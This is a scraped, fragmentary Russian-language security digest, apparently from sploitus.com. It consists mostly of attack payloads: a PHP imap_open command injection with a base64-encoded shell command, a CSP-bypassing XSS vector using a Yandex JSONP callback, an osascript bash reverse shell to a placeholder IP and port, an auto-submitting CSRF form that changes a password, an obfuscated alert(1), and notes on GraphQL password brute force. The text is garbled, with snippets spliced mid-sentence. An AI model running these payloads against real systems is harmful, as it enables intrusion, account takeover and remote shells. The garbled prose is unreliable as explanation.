
https://sploitus.com
Size: a a a
echo '1234567890'>/tmp/test0001
:<?phpОбязательно читаем подробности тут.
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
<meta http-equiv="Content-Security-Policy" content="default-src https://hello; child-src 'none'; object-src 'none'">
включит соотвествующий CSP, как если бы он был в заголовках.Refresh: 3;URL=https://hello/
покажет содержимое страницы на три секунды, а потом перенаправит пользователя, как если бы на странице был тег<meta http-equiv="refresh" content="3;https://hello/">
ЗаголовокLink: <https://hello/>;rel=stylesheet
попытается подгрузить и применить на страницу CSS, как если на странице был тег<link rel="stylesheet" href="https://hello/">правда, только для Firefox🦊
Content-Security-Policy: default-src none; script-src 'unsafe-inline' 'nonce-rhg4nkW7bVP4DzlAfkMrdg==' *.yandex.netА для Яндекса как раз есть пара примерчиков. Итого, наш мега-вектор принимает вид:
"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>PWNED!
osascript -e "do shell script \"bash -i >& /dev/tcp/%ip%/%port% 0>&1 \" with administrator privileges"
Нужен контроль над другим приложением?osascript -e 'tell app "Chrome" to display dialog "Hello World"'
(В Mojave нужно дать доступ через меню «Accessibility»)do shell script
<body onload="document.forms[0].submit();">
<form action="https://visim" method="POST" enctype="text/plain">
<input type="hidden" name='{"action":"changepassword","password":"PwnMePls!1!!"}//' value="">
</form>
</body>
FindTwin face search demo
в title говорит о том, что это демка, но поиск по закрытым профилям вконтактике — уже приятно.password_contains
, password_not_contains
, password_starts_with
и др. И что самое главное - авторизация для таких полей реализована некорректно, допуская error-based перебор символов./[a-z().]/
(ха). Выглядит это как набор функций, ценности особо не несёт, но выглядит забавно.alert(1)
: with(escape())with(eval.bind)eval(unescape(match().concat(strike().big().link().length).concat(escape(escape.name.length).concat(escape(...call.name))).concat(escape(escape(link())).length).concat(link().blink().link().length).concat(link().link().strike().length).concat(name.link().length).concat(big().big().length).concat(fixed().big().length).join(unescape(...escape(this)))))
GET /api/user.info?callback=xek
HTTP/1.1
callback
jsonp
cb
jp